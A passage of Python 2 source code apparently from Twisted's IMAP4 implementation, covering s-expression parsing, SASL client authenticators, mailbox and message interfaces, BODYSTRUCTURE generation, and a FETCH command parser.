}
for (i, c, isList) in zip(range(len(results)), results, listsList):
if isList:
if begun is not None:
copy.extend(splitOn(results[begun:i], pred, tran))
begun = None
copy.append(collapseStrings(c))
elif begun is None:
begun = i
if begun is not None:
copy.extend(splitOn(results[begun:], pred, tran))
return copy
def parseNestedParens(s, handleLiteral = 1):
"""Parse an s-exp-like string into a more useful data structure.
@type s: C{str}
@param s: The s-exp-like string to parse
@rtype: C{list} of C{str} and C{list}
@return: A list containing the tokens present in the input.
@raise MismatchedNesting: Raised if the number or placement
of opening or closing parenthesis is invalid.
"""
s = s.strip()
inQuote = 0
contentStack = [[]]
try:
i = 0
L = len(s)
while i < L:
c = s[i]
if inQuote:
if c == '\\':
contentStack[-1].append(s[i:i+2])
i += 2
continue
elif c == '"':
inQuote = not inQuote
contentStack[-1].append(c)
i += 1
else:
if c == '"':
contentStack[-1].append(c)
inQuote = not inQuote
i += 1
elif handleLiteral and c == '{':
end = s.find('}', i)
if end == -1:
raise ValueError, "Malformed literal"
literalSize = int(s[i+1:end])
contentStack[-1].append((s[end+3:end+3+literalSize],))
i = end + 3 + literalSize
elif c == '(' or c == '[':
contentStack.append([])
i += 1
elif c == ')' or c == ']':
contentStack[-2].append(contentStack.pop())
i += 1
else:
contentStack[-1].append(c)
i += 1
except IndexError:
raise MismatchedNesting(s)
if len(contentStack) != 1:
raise MismatchedNesting(s)
return collapseStrings(contentStack[0])
def _quote(s):
return '"%s"' % (s.replace('\\', '\\\\').replace('"', '\\"'),)
def _literal(s):
return '{%d}\r\n%s' % (len(s), s)
class DontQuoteMe:
def __init__(self, value):
self.value = value
def __str__(self):
return str(self.value)
_ATOM_SPECIALS = '(){ %*"'
def _needsQuote(s):
if s == '':
return 1
for c in s:
if c < '\x20' or c > '\x7f':
return 1
if c in _ATOM_SPECIALS:
return 1
return 0
def _prepareMailboxName(name):
name = name.encode('imap4-utf-7')
if _needsQuote(name):
return _quote(name)
return name
def _needsLiteral(s):
# Change this to "return 1" to wig out stupid clients
return '\n' in s or '\r' in s or len(s) > 1000
def collapseNestedLists(items):
"""Turn a nested list structure into an s-exp-like string.
Strings in C{items} will be sent as literals if they contain CR or LF,
otherwise they will be quoted. References to None in C{items} will be
translated to the atom NIL. Objects with a 'read' attribute will have
it called on them with no arguments and the returned string will be
inserted into the output as a literal. Integers will be converted to
strings and inserted into the output unquoted. Instances of
C{DontQuoteMe} will be converted to strings and inserted into the output
unquoted.
This function used to be much nicer, and only quote things that really
needed to be quoted (and C{DontQuoteMe} did not exist), however, many
broken IMAP4 clients were unable to deal with this level of sophistication,
forcing the current behavior to be adopted for practical reasons.
@type items: Any iterable
@rtype: C{str}
"""
pieces = []
for i in items:
if i is None:
pieces.extend([' ', 'NIL'])
elif isinstance(i, (DontQuoteMe, int, long)):
pieces.extend([' ', str(i)])
elif isinstance(i, types.StringTypes):
if _needsLiteral(i):
pieces.extend([' ', '{', str(len(i)), '}', IMAP4Server.delimiter, i])
else:
pieces.extend([' ', _quote(i)])
elif hasattr(i, 'read'):
d = i.read()
pieces.extend([' ', '{', str(len(d)), '}', IMAP4Server.delimiter, d])
else:
pieces.extend([' ', '(%s)' % (collapseNestedLists(i),)])
return ''.join(pieces[1:])
class IClientAuthentication(Interface):
def getName():
"""Return an identifier associated with this authentication scheme.
@rtype: C{str}
"""
def challengeResponse(secret, challenge):
"""Generate a challenge response string"""
class CramMD5ClientAuthenticator:
implements(IClientAuthentication)
def __init__(self, user):
self.user = user
def getName(self):
return "CRAM-MD5"
def challengeResponse(self, secret, chal):
response = hmac.HMAC(secret, chal).hexdigest()
return '%s %s' % (self.user, response)
class LOGINAuthenticator:
implements(IClientAuthentication)
def __init__(self, user):
self.user = user
self.challengeResponse = self.challengeUsername
def getName(self):
return "LOGIN"
def challengeUsername(self, secret, chal):
# Respond to something like "Username:"
self.challengeResponse = self.challengeSecret
return self.user
def challengeSecret(self, secret, chal):
# Respond to something like "Password:"
return secret
class PLAINAuthenticator:
implements(IClientAuthentication)
def __init__(self, user):
self.user = user
def getName(self):
return "PLAIN"
def challengeResponse(self, secret, chal):
return '\0%s\0%s' % (self.user, secret)
class MailboxException(IMAP4Exception): pass
class MailboxCollision(MailboxException):
def __str__(self):
return 'Mailbox named %s already exists' % self.args
class NoSuchMailbox(MailboxException):
def __str__(self):
return 'No mailbox named %s exists' % self.args
class ReadOnlyMailbox(MailboxException):
def __str__(self):
return 'Mailbox open in read-only state'
class IAccount(Interface):
"""Interface for Account classes
Implementors of this interface should consider implementing
C{INamespacePresenter}.
"""
def addMailbox(name, mbox = None):
"""Add a new mailbox to this account
@type name: C{str}
@param name: The name associated with this mailbox. It may not
contain multiple hierarchical parts.
@type mbox: An object implementing C{IMailbox}
@param mbox: The mailbox to associate with this name. If C{None},
a suitable default is created and used.
@rtype: C{Deferred} or C{bool}
@return: A true value if the creation succeeds, or a deferred whose
callback will be invoked when the creation succeeds.
@raise MailboxException: Raised if this mailbox cannot be added for
some reason. This may also be raised asynchronously, if a C{Deferred}
is returned.
"""
def create(pathspec):
"""Create a new mailbox from the given hierarchical name.
@type pathspec: C{str}
@param pathspec: The full hierarchical name of a new mailbox to create.
If any of the inferior hierarchical names to this one do not exist,
they are created as well.
@rtype: C{Deferred} or C{bool}
@return: A true value if the creation succeeds, or a deferred whose
callback will be invoked when the creation succeeds.
@raise MailboxException: Raised if this mailbox cannot be added.
This may also be raised asynchronously, if a C{Deferred} is
returned.
"""
def select(name, rw=True):
"""Acquire a mailbox, given its name.
@type name: C{str}
@param name: The mailbox to acquire
@type rw: C{bool}
@param rw: If a true value, request a read-write version of this
mailbox. If a false value, request a read-only version.
@rtype: Any object implementing C{IMailbox} or C{Deferred}
@return: The mailbox object, or a C{Deferred} whose callback will
be invoked with the mailbox object. None may be returned if the
specified mailbox may not be selected for any reason.
"""
def delete(name):
"""Delete the mailbox with the specified name.
@type name: C{str}
@param name: The mailbox to delete.
@rtype: C{Deferred} or C{bool}
@return: A true value if the mailbox is successfully deleted, or a
C{Deferred} whose callback will be invoked when the deletion
completes.
@raise MailboxException: Raised if this mailbox cannot be deleted.
This may also be raised asynchronously, if a C{Deferred} is returned.
"""
def rename(oldname, newname):
"""Rename a mailbox
@type oldname: C{str}
@param oldname: The current name of the mailbox to rename.
@type newname: C{str}
@param newname: The new name to associate with the mailbox.
@rtype: C{Deferred} or C{bool}
@return: A true value if the mailbox is successfully renamed, or a
C{Deferred} whose callback will be invoked when the rename operation
is completed.
@raise MailboxException: Raised if this mailbox cannot be
renamed. This may also be raised asynchronously, if a C{Deferred}
is returned.
"""
def isSubscribed(name):
"""Check the subscription status of a mailbox
@type name: C{str}
@param name: The name of the mailbox to check
@rtype: C{Deferred} or C{bool}
@return: A true value if the given mailbox is currently subscribed
to, a false value otherwise. A C{Deferred} may also be returned
whose callback will be invoked with one of these values.
"""
def subscribe(name):
"""Subscribe to a mailbox
@type name: C{str}
@param name: The name of the mailbox to subscribe to
@rtype: C{Deferred} or C{bool}
@return: A true value if the mailbox is subscribed to successfully,
or a Deferred whose callback will be invoked with this value when
the subscription is successful.
@raise MailboxException: Raised if this mailbox cannot be
subscribed to. This may also be raised asynchronously, if a
C{Deferred} is returned.
"""
def unsubscribe(name):
"""Unsubscribe from a mailbox
@type name: C{str}
@param name: The name of the mailbox to unsubscribe from
@rtype: C{Deferred} or C{bool}
@return: A true value if the mailbox is unsubscribed from successfully,
or a Deferred whose callback will be invoked with this value when
the unsubscription is successful.
@raise MailboxException: Raised if this mailbox cannot be
unsubscribed from. This may also be raised asynchronously, if a
C{Deferred} is returned.
"""
def listMailboxes(ref, wildcard):
"""List all the mailboxes that meet a certain criteria
@type ref: C{str}
@param ref: The context in which to apply the wildcard
@type wildcard: C{str}
@param wildcard: An expression against which to match mailbox names.
'*' matches any number of characters in a mailbox name, and '%'
matches similarly, but will not match across hierarchical boundaries.
@rtype: C{list} of C{tuple}
@return: A list of C{(mailboxName, mailboxObject)} which meet the
given criteria. C{mailboxObject} should implement either
C{IMailboxInfo} or C{IMailbox}. A Deferred may also be returned.
"""
class INamespacePresenter(Interface):
def getPersonalNamespaces():
"""Report the available personal namespaces.
Typically there should be only one personal namespace. A common
name for it is \"\", and its hierarchical delimiter is usually
\"/\".
@rtype: iterable of two-tuples of strings
@return: The personal namespaces and their hierarchical delimiters.
If no namespaces of this type exist, None should be returned.
"""
def getSharedNamespaces():
"""Report the available shared namespaces.
Shared namespaces do not belong to any individual user but are
usually to one or more of them. Examples of shared namespaces
might be \"#news\" for a usenet gateway.
@rtype: iterable of two-tuples of strings
@return: The shared namespaces and their hierarchical delimiters.
If no namespaces of this type exist, None should be returned.
"""
def getUserNamespaces():
"""Report the available user namespaces.
These are namespaces that contain folders belonging to other users
access to which this account has been granted.
@rtype: iterable of two-tuples of strings
@return: The user namespaces and their hierarchical delimiters.
If no namespaces of this type exist, None should be returned.
"""
class MemoryAccount(object):
implements(IAccount, INamespacePresenter)
mailboxes = None
subscriptions = None
top_id = 0
def __init__(self, name):
self.name = name
self.mailboxes = {}
self.subscriptions = []
def allocateID(self):
id = self.top_id
self.top_id += 1
return id
##
## IAccount
##
def addMailbox(self, name, mbox = None):
name = name.upper()
if self.mailboxes.has_key(name):
raise MailboxCollision, name
if mbox is None:
mbox = self._emptyMailbox(name, self.allocateID())
self.mailboxes[name] = mbox
return 1
def create(self, pathspec):
paths = filter(None, pathspec.split('/'))
for accum in range(1, len(paths)):
try:
self.addMailbox('/'.join(paths[:accum]))
except MailboxCollision:
pass
try:
self.addMailbox('/'.join(paths))
except MailboxCollision:
if not pathspec.endswith('/'):
return False
return True
def _emptyMailbox(self, name, id):
raise NotImplementedError
def select(self, name, readwrite=1):
return self.mailboxes.get(name.upper())
def delete(self, name):
name = name.upper()
# See if this mailbox exists at all
mbox = self.mailboxes.get(name)
if not mbox:
raise MailboxException("No such mailbox")
# See if this box is flagged \Noselect
if r'\Noselect' in mbox.getFlags():
# Check for hierarchically inferior mailboxes with this one
# as part of their root.
for others in self.mailboxes.keys():
if others != name and others.startswith(name):
raise MailboxException, "Hierarchically inferior mailboxes exist and \\Noselect is set"
mbox.destroy()
# iff there are no hierarchically inferior names, we will
# delete it from our ken.
if self._inferiorNames(name) > 1:
del self.mailboxes[name]
def rename(self, oldname, newname):
oldname = oldname.upper()
newname = newname.upper()
if not self.mailboxes.has_key(oldname):
raise NoSuchMailbox, oldname
inferiors = self._inferiorNames(oldname)
inferiors = [(o, o.replace(oldname, newname, 1)) for o in inferiors]
for (old, new) in inferiors:
if self.mailboxes.has_key(new):
raise MailboxCollision, new
for (old, new) in inferiors:
self.mailboxes[new] = self.mailboxes[old]
del self.mailboxes[old]
def _inferiorNames(self, name):
inferiors = []
for infname in self.mailboxes.keys():
if infname.startswith(name):
inferiors.append(infname)
return inferiors
def isSubscribed(self, name):
return name.upper() in self.subscriptions
def subscribe(self, name):
name = name.upper()
if name not in self.subscriptions:
self.subscriptions.append(name)
def unsubscribe(self, name):
name = name.upper()
if name not in self.subscriptions:
raise MailboxException, "Not currently subscribed to " + name
self.subscriptions.remove(name)
def listMailboxes(self, ref, wildcard):
ref = self._inferiorNames(ref.upper())
wildcard = wildcardToRegexp(wildcard, '/')
return [(i, self.mailboxes[i]) for i in ref if wildcard.match(i)]
##
## INamespacePresenter
##
def getPersonalNamespaces(self):
return [["", "/"]]
def getSharedNamespaces(self):
return None
def getOtherNamespaces(self):
return None
_statusRequestDict = {
'MESSAGES': 'getMessageCount',
'RECENT': 'getRecentCount',
'UIDNEXT': 'getUIDNext',
'UIDVALIDITY': 'getUIDValidity',
'UNSEEN': 'getUnseenCount'
}
def statusRequestHelper(mbox, names):
r = {}
for n in names:
r[n] = getattr(mbox, _statusRequestDict[n.upper()])()
return r
def parseAddr(addr):
if addr is None:
return [(None, None, None),]
addrs = email.Utils.getaddresses([addr])
return [[fn or None, None] + addr.split('@') for fn, addr in addrs]
def getEnvelope(msg):
headers = msg.getHeaders(True)
date = headers.get('date')
subject = headers.get('subject')
from_ = headers.get('from')
sender = headers.get('sender', from_)
reply_to = headers.get('reply-to', from_)
to = headers.get('to')
cc = headers.get('cc')
bcc = headers.get('bcc')
in_reply_to = headers.get('in-reply-to')
mid = headers.get('message-id')
return (date, subject, parseAddr(from_), parseAddr(sender),
reply_to and parseAddr(reply_to), to and parseAddr(to),
cc and parseAddr(cc), bcc and parseAddr(bcc), in_reply_to, mid)
def getLineCount(msg):
# XXX - Super expensive, CACHE THIS VALUE FOR LATER RE-USE
# XXX - This must be the number of lines in the ENCODED version
lines = 0
for _ in msg.getBodyFile():
lines += 1
return lines
def unquote(s):
if s[0] == s[-1] == '"':
return s[1:-1]
return s
def getBodyStructure(msg, extended=False):
# XXX - This does not properly handle multipart messages
# BODYSTRUCTURE is obscenely complex and criminally under-documented.
attrs = {}
headers = 'content-type', 'content-id', 'content-description', 'content-transfer-encoding'
headers = msg.getHeaders(False, *headers)
mm = headers.get('content-type')
if mm:
mm = ''.join(mm.splitlines())
mimetype = mm.split(';')
if mimetype:
type = mimetype[0].split('/', 1)
if len(type) == 1:
major = type[0]
minor = None
elif len(type) == 2:
major, minor = type
else:
major = minor = None
attrs = dict([x.strip().lower().split('=', 1) for x in mimetype[1:]])
else:
major = minor = None
else:
major = minor = None
size = str(msg.getSize())
unquotedAttrs = [(k, unquote(v)) for (k, v) in attrs.iteritems()]
result = [
major, minor, # Main and Sub MIME types
unquotedAttrs, # content-type parameter list
headers.get('content-id'),
headers.get('content-description'),
headers.get('content-transfer-encoding'),
size, # Number of octets total
]
if major is not None:
if major.lower() == 'text':
result.append(str(getLineCount(msg)))
elif (major.lower(), minor.lower()) == ('message', 'rfc822'):
contained = msg.getSubPart(0)
result.append(getEnvelope(contained))
result.append(getBodyStructure(contained, False))
result.append(str(getLineCount(contained)))
if not extended or major is None:
return result
if major.lower() != 'multipart':
headers = 'content-md5', 'content-disposition', 'content-language'
headers = msg.getHeaders(False, *headers)
disp = headers.get('content-disposition')
# XXX - I dunno if this is really right
if disp:
disp = disp.split('; ')
if len(disp) == 1:
disp = (disp[0].lower(), None)
elif len(disp) > 1:
disp = (disp[0].lower(), [x.split('=') for x in disp[1:]])
result.append(headers.get('content-md5'))
result.append(disp)
result.append(headers.get('content-language'))
else:
result = [result]
try:
i = 0
while True:
submsg = msg.getSubPart(i)
result.append(getBodyStructure(submsg))
i += 1
except IndexError:
result.append(minor)
result.append(attrs.items())
# XXX - I dunno if this is really right
headers = msg.getHeaders(False, 'content-disposition', 'content-language')
disp = headers.get('content-disposition')
if disp:
disp = disp.split('; ')
if len(disp) == 1:
disp = (disp[0].lower(), None)
elif len(disp) > 1:
disp = (disp[0].lower(), [x.split('=') for x in disp[1:]])
result.append(disp)
result.append(headers.get('content-language'))
return result
class IMessagePart(Interface):
def getHeaders(negate, *names):
"""Retrieve a group of message headers.
@type names: C{tuple} of C{str}
@param names: The names of the headers to retrieve or omit.
@type negate: C{bool}
@param negate: If True, indicates that the headers listed in C{names}
should be omitted from the return value, rather than included.
@rtype: C{dict}
@return: A mapping of header field names to header field values
"""
def getBodyFile():
"""Retrieve a file object containing only the body of this message.
"""
def getSize():
"""Retrieve the total size, in octets, of this message.
@rtype: C{int}
"""
def isMultipart():
"""Indicate whether this message has subparts.
@rtype: C{bool}
"""
def getSubPart(part):
"""Retrieve a MIME sub-message
@type part: C{int}
@param part: The number of the part to retrieve, indexed from 0.
@raise IndexError: Raised if the specified part does not exist.
@raise TypeError: Raised if this message is not multipart.
@rtype: Any object implementing C{IMessagePart}.
@return: The specified sub-part.
"""
class IMessage(IMessagePart):
def getUID():
"""Retrieve the unique identifier associated with this message.
"""
def getFlags():
"""Retrieve the flags associated with this message.
@rtype: C{iterable}
@return: The flags, represented as strings.
"""
def getInternalDate():
"""Retrieve the date internally associated with this message.
@rtype: C{str}
@return: An RFC822-formatted date string.
"""
class IMessageFile(Interface):
"""Optional message interface for representing messages as files.
If provided by message objects, this interface will be used instead
the more complex MIME-based interface.
"""
def open():
"""Return an file-like object opened for reading.
Reading from the returned file will return all the bytes
of which this message consists.
"""
class ISearchableMailbox(Interface):
def search(query, uid):
"""Search for messages that meet the given query criteria.
If this interface is not implemented by the mailbox, L{IMailbox.fetch}
and various methods of L{IMessage} will be used instead.
Implementations which wish to offer better performance than the
default implementation should implement this interface.
@type query: C{list}
@param query: The search criteria
@type uid: C{bool}
@param uid: If true, the IDs specified in the query are UIDs;
otherwise they are message sequence IDs.
@rtype: C{list} or C{Deferred}
@return: A list of message sequence numbers or message UIDs which
match the search criteria or a C{Deferred} whose callback will be
invoked with such a list.
"""
class IMessageCopier(Interface):
def copy(messageObject):
"""Copy the given message object into this mailbox.
The message object will be one which was previously returned by
L{IMailbox.fetch}.
Implementations which wish to offer better performance than the
default implementation should implement this interface.
If this interface is not implemented by the mailbox, IMailbox.addMessage
will be used instead.
@rtype: C{Deferred} or C{int}
@return: Either the UID of the message or a Deferred which fires
with the UID when the copy finishes.
"""
class IMailboxInfo(Interface):
"""Interface specifying only the methods required for C{listMailboxes}.
Implementations can return objects implementing only these methods for
return to C{listMailboxes} if it can allow them to operate more
efficiently.
"""
def getFlags():
"""Return the flags defined in this mailbox
Flags with the \\ prefix are reserved for use as system flags.
@rtype: C{list} of C{str}
@return: A list of the flags that can be set on messages in this mailbox.
"""
def getHierarchicalDelimiter():
"""Get the character which delimits namespaces for in this mailbox.
@rtype: C{str}
"""
class IMailbox(IMailboxInfo):
def getUIDValidity():
"""Return the unique validity identifier for this mailbox.
@rtype: C{int}
"""
def getUIDNext():
"""Return the likely UID for the next message added to this mailbox.
@rtype: C{int}
"""
def getUID(message):
"""Return the UID of a message in the mailbox
@type message: C{int}
@param message: The message sequence number
@rtype: C{int}
@return: The UID of the message.
"""
def getMessageCount():
"""Return the number of messages in this mailbox.
@rtype: C{int}
"""
def getRecentCount():
"""Return the number of messages with the 'Recent' flag.
@rtype: C{int}
"""
def getUnseenCount():
"""Return the number of messages with the 'Unseen' flag.
@rtype: C{int}
"""
def isWriteable():
"""Get the read/write status of the mailbox.
@rtype: C{int}
@return: A true value if write permission is allowed, a false value otherwise.
"""
def destroy():
"""Called before this mailbox is deleted, permanently.
If necessary, all resources held by this mailbox should be cleaned
up here. This function _must_ set the \\Noselect flag on this
mailbox.
"""
def requestStatus(names):
"""Return status information about this mailbox.
Mailboxes which do not intend to do any special processing to
generate the return value, C{statusRequestHelper} can be used
to build the dictionary by calling the other interface methods
which return the data for each name.
@type names: Any iterable
@param names: The status names to return information regarding.
The possible values for each name are: MESSAGES, RECENT, UIDNEXT,
UIDVALIDITY, UNSEEN.
@rtype: C{dict} or C{Deferred}
@return: A dictionary containing status information about the
requested names is returned. If the process of looking this
information up would be costly, a deferred whose callback will
eventually be passed this dictionary is returned instead.
"""
def addListener(listener):
"""Add a mailbox change listener
@type listener: Any object which implements C{IMailboxListener}
@param listener: An object to add to the set of those which will
be notified when the contents of this mailbox change.
"""
def removeListener(listener):
"""Remove a mailbox change listener
@type listener: Any object previously added to and not removed from
this mailbox as a listener.
@param listener: The object to remove from the set of listeners.
@raise ValueError: Raised when the given object is not a listener for
this mailbox.
"""
def addMessage(message, flags = (), date = None):
"""Add the given message to this mailbox.
@type message: A file-like object
@param message: The RFC822 formatted message
@type flags: Any iterable of C{str}
@param flags: The flags to associate with this message
@type date: C{str}
@param date: If specified, the date to associate with this
message.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with the message
id if the message is added successfully and whose errback is
invoked otherwise.
@raise ReadOnlyMailbox: Raised if this Mailbox is not open for
read-write.
"""
def expunge():
"""Remove all messages flagged \\Deleted.
@rtype: C{list} or C{Deferred}
@return: The list of message sequence numbers which were deleted,
or a C{Deferred} whose callback will be invoked with such a list.
@raise ReadOnlyMailbox: Raised if this Mailbox is not open for
read-write.
"""
def fetch(messages, uid):
"""Retrieve one or more messages.
@type messages: C{MessageSet}
@param messages: The identifiers of messages to retrieve information
about
@type uid: C{bool}
@param uid: If true, the IDs specified in the query are UIDs;
otherwise they are message sequence IDs.
@rtype: Any iterable of two-tuples of message sequence numbers and
implementors of C{IMessage}.
"""
def store(messages, flags, mode, uid):
"""Set the flags of one or more messages.
@type messages: A MessageSet object with the list of messages requested
@param messages: The identifiers of the messages to set the flags of.
@type flags: sequence of C{str}
@param flags: The flags to set, unset, or add.
@type mode: -1, 0, or 1
@param mode: If mode is -1, these flags should be removed from the
specified messages. If mode is 1, these flags should be added to
the specified messages. If mode is 0, all existing flags should be
cleared and these flags should be added.
@type uid: C{bool}
@param uid: If true, the IDs specified in the query are UIDs;
otherwise they are message sequence IDs.
@rtype: C{dict} or C{Deferred}
@return: A C{dict} mapping message sequence numbers to sequences of C{str}
representing the flags set on the message after this operation has
been performed, or a C{Deferred} whose callback will be invoked with
such a C{dict}.
@raise ReadOnlyMailbox: Raised if this mailbox is not open for
read-write.
"""
class ICloseableMailbox(Interface):
"""A supplementary interface for mailboxes which require cleanup on close.
Implementing this interface is optional. If it is implemented, the protocol
code will call the close method defined whenever a mailbox is closed.
"""
def close():
"""Close this mailbox.
@return: A C{Deferred} which fires when this mailbox
has been closed, or None if the mailbox can be closed
immediately.
"""
def _formatHeaders(headers):
hdrs = [': '.join((k.title(), '\r\n'.join(v.splitlines()))) for (k, v)
in headers.iteritems()]
hdrs = '\r\n'.join(hdrs) + '\r\n'
return hdrs
def subparts(m):
i = 0
try:
while True:
yield m.getSubPart(i)
i += 1
except IndexError:
pass
def iterateInReactor(i):
"""Consume an interator at most a single iteration per reactor iteration.
If the iterator produces a Deferred, the next iteration will not occur
until the Deferred fires, otherwise the next iteration will be taken
in the next reactor iteration.
@rtype: C{Deferred}
@return: A deferred which fires (with None) when the iterator is
exhausted or whose errback is called if there is an exception.
"""
from twisted.internet import reactor
d = defer.Deferred()
def go(last):
try:
r = i.next()
except StopIteration:
d.callback(last)
except:
d.errback()
else:
if isinstance(r, defer.Deferred):
r.addCallback(go)
else:
reactor.callLater(0, go, r)
go(None)
return d
class MessageProducer:
CHUNK_SIZE = 2 ** 2 ** 2 ** 2
def __init__(self, msg, buffer = None, scheduler = None):
"""Produce this message.
@param msg: The message I am to produce.
@type msg: L{IMessage}
@param buffer: A buffer to hold the message in. If None, I will
use a L{tempfile.TemporaryFile}.
@type buffer: file-like
"""
self.msg = msg
if buffer is None:
buffer = tempfile.TemporaryFile()
self.buffer = buffer
if scheduler is None:
scheduler = iterateInReactor
self.scheduler = scheduler
self.write = self.buffer.write
def beginProducing(self, consumer):
self.consumer = consumer
return self.scheduler(self._produce())
def _produce(self):
headers = self.msg.getHeaders(True)
boundary = None
if self.msg.isMultipart():
content = headers.get('content-type')
parts = [x.split('=', 1) for x in content.split(';')[1:]]
parts = dict([(k.lower().strip(), v) for (k, v) in parts])
boundary = parts.get('boundary')
if boundary is None:
# Bastards
boundary = '----=_%f_boundary_%f' % (time.time(), random.random())
headers['content-type'] += '; boundary="%s"' % (boundary,)
else:
if boundary.startswith('"') and boundary.endswith('"'):
boundary = boundary[1:-1]
self.write(_formatHeaders(headers))
self.write('\r\n')
if self.msg.isMultipart():
for p in subparts(self.msg):
self.write('\r\n--%s\r\n' % (boundary,))
yield MessageProducer(p, self.buffer, self.scheduler
).beginProducing(None
)
self.write('\r\n--%s--\r\n' % (boundary,))
else:
f = self.msg.getBodyFile()
while True:
b = f.read(self.CHUNK_SIZE)
if b:
self.buffer.write(b)
yield None
else:
break
if self.consumer:
self.buffer.seek(0, 0)
yield FileProducer(self.buffer
).beginProducing(self.consumer
).addCallback(lambda _: self
)
class _FetchParser:
class Envelope:
# Response should be a list of fields from the message:
# date, subject, from, sender, reply-to, to, cc, bcc, in-reply-to,
# and message-id.
#
# from, sender, reply-to, to, cc, and bcc are themselves lists of
# address information:
# personal name, source route, mailbox name, host name
#
# reply-to and sender must not be None. If not present in a message
# they should be defaulted to the value of the from field.
type = 'envelope'
__str__ = lambda self: 'envelope'
class Flags:
type = 'flags'
__str__ = lambda self: 'flags'
class InternalDate:
type = 'internaldate'
__str__ = lambda self: 'internaldate'
class RFC822Header:
type = 'rfc822header'
__str__ = lambda self: 'rfc822.header'
class RFC822Text:
type = 'rfc822text'
__str__ = lambda self: 'rfc822.text'
class RFC822Size:
type = 'rfc822size'
__str__ = lambda self: 'rfc822.size'
class RFC822:
type = 'rfc822'
__str__ = lambda self: 'rfc822'
class UID:
type = 'uid'
__str__ = lambda self: 'uid'
class Body:
type = 'body'
peek = False
header = None
mime = None
text = None
part = ()
empty = False
partialBegin = None
partialLength = None
def __str__(self):
base = 'BODY'
part = ''
separator = ''
if self.part:
part = '.'.join([str(x + 1) for x in self.part])
separator = '.'
# if self.peek:
# base += '.PEEK'
if self.header:
base += '[%s%s%s]' % (part, separator, self.header,)
elif self.text:
base += '[%s%sTEXT]' % (part, separator)
elif self.mime:
base += '[%s%sMIME]' % (part, separator)
elif self.empty:
base += '[%s]' % (part,)
if self.partialBegin is not None:
base += '<%d.%d>' % (self.partialBegin, self.partialLength)
return base
class BodyStructure:
type = 'bodystructure'
__str__ = lambda self: 'bodystructure'
# These three aren't top-level, they don't need type indicators
class Header:
negate = False
fields = None
part = None
def __str__(self):
base = 'HEADER'
if self.fields:
base += '.FIELDS'
if self.negate:
base += '.NOT'
fields = []
for f in self.fields:
f = f.title()
if _needsQuote(f):
f = _quote(f)
fields.append(f)
base += ' (%s)' % ' '.join(fields)
if self.part:
base = '.'.join([str(x + 1) for x in self.part]) + '.' + base
return base
class Text:
pass
class MIME:
pass
parts = None
_simple_fetch_att = [
('envelope', Envelope),
('flags', Flags),
('internaldate', InternalDate),
('rfc822.header', RFC822Header),
('rfc822.text', RFC822Text),
('rfc822.size', RFC822Size),
('rfc822', RFC822),
('uid', UID),
('bodystructure', BodyStructure),
]
def __init__(self):
self.state = ['initial']
self.result = []
self.remaining = ''
def parseString(self, s):
s = self.remaining + s
try:
while s or self.state:
# print 'Entering state_' + self.state[-1] + ' with', repr(s)
state = self.state.pop()
try:
used = getattr(self, 'state_' + state)(s)
except:
self.state.append(state)
raise
else:
# print state, 'consumed', repr(s[:used])
s = s[used:]
finally:
self.remaining = s
def state_initial(self, s):
# In the initial state, the literals "ALL", "FULL", and "FAST"
# are accepted, as is a ( indicating the beginning of a fetch_att
# token, as is the beginning of a fetch_att token.
if s == '':
return 0
l = s.lower()
if l.startswith('all'):
self.result.extend((
self.Flags(), self.InternalDate(),
self.RFC822Size(), self.Envelope()
))
return 3
if l.startswith('full'):
self.result.extend((
self.Flags(), self.InternalDate(),
self.RFC822Size(), self.Envelope(),
self.Body()
))
return 4
if l.startswith('fast'):
self.result.extend((
self.Flags(), self.InternalDate(), self.RFC822Size(),
))
return 4
if l.startswith('('):
self.state.extend(('close_paren', 'maybe_fetch_att', 'fetch_att'))
return 1
self.state.append('fetch_att')
return 0
def state_close_paren(self, s):
if s.startswith(')'):
return 1
raise Exception("Missing )")
def state_whitespace(self, s):
# Eat up all the leading whitespace
if not s or not s[0].isspace():
raise Exception("Whitespace expected, none found")
i = 0
for i in range(len(s)):
if not s[i].isspace():
break
return i
def state_maybe_fetch_att(self, s):
if not s.startswith(')'):
self.state.extend(('maybe_fetch_att', 'fetch_att', 'whitespace'))
return 0
def state_fetch_att(self, s):
# Allowed fetch_att tokens are "ENVELOPE", "FLAGS", "INTERNALDATE",
# "RFC822", "RFC822.HEADER", "RFC822.SIZE", "RFC822.TEXT", "BODY",
# "BODYSTRUCTURE", "UID",
# "BODY [".PEEK"] [<section>] ["<" <number> "." <nz_number> ">"]
l = s.lower()
for (name, cls) in self._simple_fetch_att:
if l.startswith(name):
self.result.append(cls())
return len(name)
b = self.Body()
if l.startswith('body.peek'):
b.peek = True
used = 9
elif l.startswith('body'):
used = 4
else:
raise Exception("Nothing recognized in fetch_att: %s" % (l,))
self.pending_body = b
self.state.extend(('got_body', 'maybe_partial', 'maybe_section'))
return used
def state_got_body(self, s):
self.result.append(self.pending_body)
del self.pending_body
return 0
def state_maybe_section(self, s):
if not s.startswith("["):
return 0
self.state.extend(('section', 'part_number'))
return 1
_partExpr = re.compile(r'(\d+(?:\.\d+)*)\.?')
def state_part_number(self, s):
m = self._partExpr.match(s)
if m is not None:
self.parts = [int(p) - 1 for p in m.groups()[0].split('.')]
return m.end()
else:
self.parts = []
return 0
def state_section(self, s):
# Grab "HEADER]" or "HEADER.FIELDS (Header list)]" or
# "HEADER.FIELDS.NOT (Header list)]" or "TEXT]" or "MIME]" or
# just "]".
l = s.lower()
used = 0
if l.startswith(']'):
self.pending_body.empty = True
used += 1
elif l.startswith('header]'):
h = self.pending_body.header = self.Header()
h.negate = True
h.fields = ()
used += 7
elif l.startswith('text]'):
self.pending_body.text = self.Text()
used += 5
elif l.startswith('mime]'):
self.pending_body.mime = self.MIME()
used += 5
else:
h = self.Header()
if l.startswith('header.fields.not'):
h.negate = True
used += 17
elif l.startswith('header.fields'):
used += 13
else:
raise Exception("Unhandled section contents: %r" % (l,))
self.pending_body.header = h
self.state.extend(('finish_section', 'header_list', 'whitespace'))
self.pending_body.part = tuple(self.parts)
self.parts = None
return used
def state_finish_section(self, s):
if not s.startswith(']'):
raise Exception("section must end with ]")
return 1
def state_header_list(self, s):
if not s.startswith('('):
raise Exception("Header list must begin with (")
end = s.find(')')
if end == -1:
raise Exception("Header list must end with )")
headers = s[1:end].split()
self.pending_body.header.fields = map(str.upper, headers)
return end + 1
def state_maybe_partial(self, s):
# Grab <number.number> or nothing at all
if not s.startswith('<'):
return 0
end = s.find('>')
if end == -1:
raise Exception("Found < but not >")
partial = s[1:end]
parts = partial.split('.', 1)
if len(parts) != 2:
raise Exception("Partial specification did not include two .-delimited integers")
begin, length = map(int, parts)
